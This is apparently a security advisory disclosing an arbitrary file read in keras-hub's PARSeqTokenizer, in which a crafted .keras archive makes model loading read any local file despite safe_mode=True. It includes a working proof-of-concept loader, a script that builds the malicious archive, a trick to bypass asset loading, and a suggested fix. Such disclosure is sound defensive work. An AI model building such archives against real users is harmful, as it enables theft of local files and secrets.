PARSeqTokenizer Arbitrary File Read via Crafted .keras Archive
Vulnerability: keras_hub.models.PARSeqTokenizer reads an attacker-controlled
file path from config.json during model deserialization with no safe mode guard.
Impact: Loading a crafted .keras file reads any file accessible to the process
and exposes its content in model.vocabulary. safe_mode=True does not protect this path.
CVE status: No CVE assigned. Distinct from CVE-2025-12058 (keras core StringLookup) and not covered by keras-hub PR #2517 (which patched BytePair/WordPiece/SentencePiece but not PARSeqTokenizer).
Root cause
keras_hub/src/models/parseq/parseq_tokenizer.py:

```python
def set_vocabulary(self, vocabulary):
    if isinstance(vocabulary, str):
        # No in_safe_mode() check before opening an arbitrary path:
        with open(vocabulary, "r", encoding="utf-8") as file:
            self.vocabulary = [line.rstrip() for line in file]
        self.vocabulary = "".join(self.vocabulary)
```
Compare with the correctly patched BytePairTokenizer (PR #2517):

```python
if isinstance(vocabulary, str):
    if serialization_lib.in_safe_mode():
        raise ValueError(
            "Requested loading a vocabulary file outside model archive..."
        )
    with open(vocabulary, "r", encoding="utf-8") as f:
        ...
```
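Stripped of keras-hub specifics, the vulnerable branch reduces to the following standalone sketch. Here `set_vocabulary` is a plain function standing in for the method; the point is that any readable path passed as a string leaks its content:

```python
import os
import tempfile

def set_vocabulary(vocabulary):
    # Mirrors the vulnerable branch: a string is treated as a file *path*
    # and opened unconditionally -- there is no in_safe_mode() check.
    if isinstance(vocabulary, str):
        with open(vocabulary, "r", encoding="utf-8") as f:
            lines = [line.rstrip() for line in f]
        return "".join(lines)
    return vocabulary

# Any file the process can read leaks into the "vocabulary":
with tempfile.NamedTemporaryFile("w", suffix=".txt", delete=False) as tmp:
    tmp.write("SENSITIVE_LINE_ONE\nSENSITIVE_LINE_TWO\n")
    target = tmp.name

print(set_vocabulary(target))  # SENSITIVE_LINE_ONESENSITIVE_LINE_TWO
os.remove(target)
```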
Affected versions
keras-hub 0.25.0 and later (PARSeq was added in PR #2089, August 27, 2025). Live-confirmed on 0.25.1 (PyPI) and 0.29.0.dev0 (source).
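A quick way to check an installed copy against the affected range is a small version comparison. The helper below is illustrative only (`parse_version` and `is_affected` are ad-hoc names, not keras-hub APIs) and treats pre-release suffixes like `.dev0` as numeric zeros:

```python
def parse_version(v: str) -> tuple:
    """Split '0.25.1' or '0.29.0.dev0' into a comparable numeric tuple."""
    parts = []
    for p in v.split("."):
        digits = "".join(ch for ch in p if ch.isdigit())
        parts.append(int(digits) if digits else 0)
    return tuple(parts)

def is_affected(version: str) -> bool:
    # PARSeq landed in 0.25.0 (PR #2089); every later release is affected
    # until a guard ships.
    return parse_version(version) >= (0, 25, 0)

print(is_affected("0.25.1"))       # True
print(is_affected("0.24.0"))       # False
print(is_affected("0.29.0.dev0"))  # True
```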
Reproduction
Requirements:

```shell
pip install keras==3.12.1 keras-hub tensorflow
```
Step 1: Create the target file (simulates the victim's sensitive file):

```shell
echo -e "SENSITIVE_LINE_ONE\nSENSITIVE_LINE_TWO" > /tmp/parseq_poc_target.txt
```
Step 2: Run the PoC script:

```python
# poc_parseq_file_read.py
import sys
from unittest.mock import MagicMock

# Stub tensorflow_text so assert_tf_libs_installed() passes (see note below).
sys.modules.setdefault("tensorflow_text", MagicMock())

import keras
import keras_hub  # required: registers keras_hub>PARSeqTokenizer

# The .keras file in this repo has vocabulary="/tmp/parseq_poc_target.txt"
model = keras.models.load_model("malicious_parseq.keras", safe_mode=True)
print("model.vocabulary:", repr(model.vocabulary))
# Prints the content of /tmp/parseq_poc_target.txt
```
Expected output:

```
[!] load_model returned: <PARSeqTokenizer ...>
model.vocabulary: 'SENSITIVE_LINE_ONESENSITIVE_LINE_TWO'
[+] SUCCESS - file content read via safe_mode=True load_model()
```
Note on tensorflow_text: assert_tf_libs_installed() is a functional
prerequisite in all keras-hub tokenizers. The mock above satisfies it.
In a real attack environment, both tensorflow and tensorflow-text are installed.
Note on import keras_hub: keras_hub must be imported before load_model()
to register the PARSeqTokenizer class in the Keras registry. This is standard
in any environment using keras-hub models.
Full self-contained PoC
See poc_parseq_file_read.py in this repo. It dynamically creates a target
file and a malicious archive, loads the model, and prints the leaked content.
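The archive itself can be assembled with nothing but the standard library. The sketch below is illustrative, not a copy of poc_parseq_file_read.py: the exact config.json layout (`module`, `registered_name`, metadata fields) is an assumption based on Keras's standard `package>ClassName` serialization convention and should be verified against a benign save of a real PARSeqTokenizer:

```python
import io
import json
import zipfile

TARGET = "/tmp/parseq_poc_target.txt"  # path the victim process will read

# Assumed config.json layout (verify against a real save):
config = {
    "module": "keras_hub.src.models.parseq.parseq_tokenizer",
    "class_name": "PARSeqTokenizer",
    "registered_name": "keras_hub>PARSeqTokenizer",
    "config": {"vocabulary": TARGET},  # the attacker-controlled path
}
metadata = {"keras_version": "3.12.1", "date_saved": "1970-01-01@00:00:00"}

# An empty zip is a valid (empty) .npz -- this keeps the archive at exactly
# 3 files, so load_assets() is skipped and nothing overwrites the path.
empty_npz = io.BytesIO()
zipfile.ZipFile(empty_npz, "w").close()

with zipfile.ZipFile("malicious_parseq.keras", "w") as zf:
    zf.writestr("config.json", json.dumps(config))
    zf.writestr("metadata.json", json.dumps(metadata))
    zf.writestr("model.weights.npz", empty_npz.getvalue())
```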
Why safe_mode=True does not protect
The Keras deserializer (serialization_lib.py:816) resolves keras_hub classes unconditionally:

```python
if package in {"keras", "keras_hub", "keras_cv", "keras_nlp"}:
    # class resolved without any safe_mode gate
    ...
```
SafeModeScope is active during from_config(), but PARSeqTokenizer.set_vocabulary() never calls in_safe_mode(). So the scope is a no-op for this code path.
Additionally, the archive has exactly 3 files (config.json, metadata.json, model.weights.npz). This causes saving_lib.py:484 to set asset_store = None, and saving_lib.py:806 to skip load_assets() entirely -- so no archive-embedded vocabulary overwrites the attacker-supplied path.
Suggested fix
Add an in_safe_mode() guard matching the pattern from PR #2517:

```python
from keras_hub.src.saving import serialization_lib

def set_vocabulary(self, vocabulary):
    if isinstance(vocabulary, str):
        if serialization_lib.in_safe_mode():
            raise ValueError(
                "Requested loading a vocabulary file outside the model "
                "archive. Pass safe_mode=False if you trust the source."
            )
        with open(vocabulary, "r", encoding="utf-8") as file:
            ...
```